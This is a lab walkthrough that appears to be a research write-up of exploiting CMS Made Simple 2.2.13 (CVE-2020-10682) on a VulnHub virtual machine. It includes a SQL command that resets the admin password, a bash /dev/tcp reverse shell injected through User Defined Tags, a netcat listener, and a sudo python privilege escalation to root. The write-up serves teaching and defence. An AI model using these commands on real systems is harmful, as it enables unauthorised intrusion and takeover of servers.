CMS Made Simple
CVE-2020-10682 | CVSS 6.8
Safe Security 2021
Table of
Key Terms
Exploit Working
Virtual Lab
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Affected version/software :
CVSS Score :
Cross-Ref : CVE-2020-10682
Mitigation :
Safe Security 2021
CMS Made Simple is a content management
system. Written in PHP and uses MySQL database.
CMS made Simple can help you build smaller
sites (around a few hundred pages) and
semi-static websites. A system to help you keep a
website updated through a comprehensive
Content Manager, which allows both editing and
creation of new pages in real time.
First released in July 2004 as an open source
package. The separation of content, function and
design has been its core strength. CMSMS (CMS
Made Simple) is easy to use, making it a delight for
non-technical content editors to manage the
day-to-day running of a site
CMS Made Simple
Safe Security 2021
This Research paper illustrates the exploitation of MySQL service running on a machine, which is running a web
application based on CMS Made Simple. CMSMS is prone to multiple vulnerabilities. The following
vulnerabilities exist : Stored XSS vulnerability, Remote Code execution Vulnerability. And also CMSMS has many
services which can be exploited. Eg. phpMyAdmin, MySQL, PHP, OpenSSL. But in this paper we will be exploiting
the service MySQL and vulnerability - Remote Code Execution. We will perform Privilege Escalation by first
getting access to a reverse shell on our machine. We will be performing this in a Virtual Lab Environment with
proof of concept.
Key Terms
Reverse shell, Nmap scan, Dirb scan, Netcat Listening
1. Reverse Shell
A reverse shell is a type of shell in which the victim machine communicates back to the attacking
machine. The attacking machine has a listener port on which it receives the connection, which by using
remote code or command execution is achieved.
2. Nmap Scan
Nmap is a popular port scanning tool to find the open ports and services on the target/victim machine
which will help an attacker to proceed further by identifying a vulnerability of a service or finding an
exploit of a particular version of a service. It is generally the first step of an attack, i.e., to scan the victim.
CMS Made Simple
Safe Security 2021
3. Dirb Scan
To find the hidden directories and files on an application, we use Dirb scan. It enlists all the directories
of a web application and the attacker will not have to guess the file names or directory names. For
example, attacker will have to search for some common directories :- /robots.txt /index.txt if the dirb
scan is not there but then finding the admin and login pages will be a long task.
4. Netcat
Can perform port scanning, simple data transfers but most common use is to listen on to a port.
Eg - nc -l
This command will instruct the local system to begin listening for TCP connections and UDP activity on
a specific port number.
nc -v
Can be used for verbose output
nc -p
To specify the port number
Altogether command can be used as nc -vlp 4545
This will listen on port 4545
After scanning the Victim machine we will find mysql service running on an open port 3306. We will exploit it
using sql injection and we will be fetching the credentials from the useful database. But this will not work as the
credentials will be in hash. So we will try to change the credentials for a user and then we will try to login into the
admin page using the changed credentials. Once into the page, we can run our reverse shell script into the
application as it is vulnerable to it. After that, we will get a reverse shell on our machine and we can try to get the
root access after trying a few things. Once we get root, we can exploit the server running the application in any
way we want. We can make it unavailable for the users or can modify a file on it.
Exploit Working
CMS Made Simple
Safe Security 2021
Cross-Ref : CVE-2020-10682
Base Score : 7.8 HIGH
CVSS Vector:
Base Score : 5.4 MEDIUM
CVSS Vector:
No solution was available till 11 Sept 2020.
1. Version 2.2.15-1 released on 2020-11-23
which mitigated or patched these
2. So the solution is to use a version of
CMSMS after 2.2.15-0.
3. From 2.2.15-1 to the newest till date
2.2.15-6 released on 2021-04-27.
Mitigation : -
Affected Version/software
CVSS Score
CMS Made Simple through version 2.2.13
Base Score : 6.8
CVSS Vector:
The overall steps we will be performing :
1. Getting the target machine IP address
2. Scan open ports by using the Nmap
3. Enumerating HTTP service with the Dirb
4. Enumerating application admin
5. Exploiting MySQL and updating admin
6. Logging in the application and local
7. Getting the root access and reading the
Oracle Virtualbox has been
used to run the machines
I have used Kali as the
attacking machine and the
victim machine is
My-Cmsms.ova which runs a
web app, made on the
CMSMS system.
Both the machines should be
on the bridged mode.
Virtual Lab Environment
CMS Made Simple
Safe Security 2021
As soon as we run the victim machine we get its IP address -
Also attacking machines IP address -
Fig 1
machine IP
Fig 2
Machine IP
Step 1
CMS Made Simple
Safe Security 2021
We will scan the Victim machine using NMAP to identify the open ports and services.
We decide to start with http port 80. After opening the IP address in the browser, we found that there
was an active application on the target machine. i.e a website made using CMS made simple.
Fig. 2.1
Fig. 3.1
Step 2
Fig. 3.2
Ports 22,80,3306 are open with services ssh,http,mysql respectively.
Step 3
Over the homepage, we found the CMS version of the target application in the bottom left of the page.
Can be seen in the screenshot below, the version is 2.2.13.
CMS Made Simple
Safe Security 2021
To find the hidden files and directories in the application, we used the Dirb scan.
We opened the /admin url in the browser. We tried some default credentials to log in, but it did not
work. We also checked SQL injection on the login page, but it was not vulnerable.
Fig. 4.1
Fig. 5.1
Step 4
Here we found 2 useful links: /admin & /phpmyadmin
Step 5
So we went to the second url : /phpmyadmin.
CMS Made Simple
Safe Security 2021
We tried the default credentials and boolean sql injection too but there was no luck.
The next open port is 3306, through which MySQL server was running. We tried to connect with the
MySQL port by using the default username and password. This time the default credentials worked
perfectly, and we are able to log into the MySQL server as root user.
Fig. 5.2
Fig. 6.1
Step 5
So time to check out the next port from the Dirb scan.
Step 6
Now we run show databases; to get the name of all available databases in the application.
Fig. 6.2
As we get database names , we used the ‘use’ command to enter the selected database. As we know
that the application name is CMS, we selected the cmsms_db. ( can be seen in the last screenshot)
CMS Made Simple
Safe Security 2021
Now we have selected the database cmsms_db. We want to check its tables. So we used
show tables;
Fig. 6.3
Step 6
As Can be seen, the table names. Now we select cms_users table as this contains all the user login
We opened that table to see the credentials
Command :- select username,email,password from cms_users;
Fig. 6.4
As we had expected, the password was stored in a hash format in the database, which means we can
either crack it or change it to log into the admin module.
First, we tried to crack it with the help of the John the Ripper utility, which did not work. Then we used
an online password-cracking site, which also did not work. Without wasting any further time on
cracking the password, we created a new password hash and updated the same hash in the DB.
Fig. 6.5
Command : update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value
FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'hackNos'))) where username = 'admin';
The query was successful so we were able to change the password. So in next step we will login into
the admin page with this password : hackNos
CMS Made Simple
Safe Security 2021
USERNAME: admin PASSWORD : hackNos
While looking around the website, we have checked various functionalities and options, but we didn’t
get any useful information. After spending some more time, we found an option which could be
utilized for our goal. We go the extensions > User Defined Tags.
“User Defined Tags” allows admin user to make code-level changes in the application. So we will
replace the code with a reverse shell script to get the reverse shell from the Victim machine.
Shell script Used : system("bash -c 'bash -i >& /dev/tcp/ 0>&1'");
Fig. 7.1
Fig. 8.1
Step 7
And as can be seen we are into the admin panel. ( on the top right of screenshot ).
Step 8
After replacing the original code with our shell script we clicked on apply and popup says User
Defined Tag was successfully updated.
CMS Made Simple
Safe Security 2021
Now we will need 2 tabs of terminal.
Fig. 9.1
Step 9
Second we run curl -vv
First we run nc -lvp 4545 to listen on port 4545 for any incoming traffic. As we have given our target
machine IP in our reverse shell script, we will get the shell once code is executed using the
curl command in next step.
Fig. 9.2
CMS Made Simple
Safe Security 2021
Now we got the reverse shell but we need the root access of the system. So for that lets try to find
some file with useful credentials. The file containing the password probably should be in the admin
directory so first we did cd /admin and then We ran ls -la to check out the files in the admin
Fig. 10.1
Step 10
We can see a file named ‘htpasswd. Let's check that out
Fig. 10.2
First, we tried to crack it with the help of the John the Ripper utility, which did not work. Then we used
an online password-cracking site, which also did not work. Without wasting any further time on
cracking the password, we created a new password hash and updated the same hash in the DB.
Fig. 10.3
Command : cat .htpasswd
CMS Made Simple
Safe Security 2021
The output is again encoded using base 32. So lets again decode it
Fig. 10.4
Step 10
We get
Username :
Password :
Lets try to login using these credentials
Command : su armour Shield@123
Fig. 11.1
Step 11
As can be seen we logged in ! By id command it clearly shows we are logged in as armour.
Also we wanted to have a bash shell for more functionality so we got a bash shell using
command : python3 -c 'import pty;pty.spawn("/bin/bash")'
Can be seen in the screenshot above we got the bash shell.
CMS Made Simple
Safe Security 2021
For privilege escalation we run the sudo -l command and see that we can run the python command
with sudo permission without root user password.
Fig. 12.1
Step 12 : Privilege Escalation
Now we have the root access of the target machine, let's find the flag or the most important file in case
of a server running an application based on CMSMS service.
Command : cd /root
cat proof.txt
Fig. 13.1
Step 13
Command : sudo -l
sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
So as we knew we could run the python command with sudo permission, we ran and got access to the
root bash shell.
Verified by the ‘id’ command.
CMS Made Simple
Safe Security 2021
1. Web application abuses : CMS Made Simple <= 2.2.13 Multiple
3. My CMSMS 1: VulnHub CTF walkthrough
4. NVD - CVE-2020-10681
5. NVD - CVE-2020-10682
6. My cmsms Vulnhub Walkthrough | [email protected]
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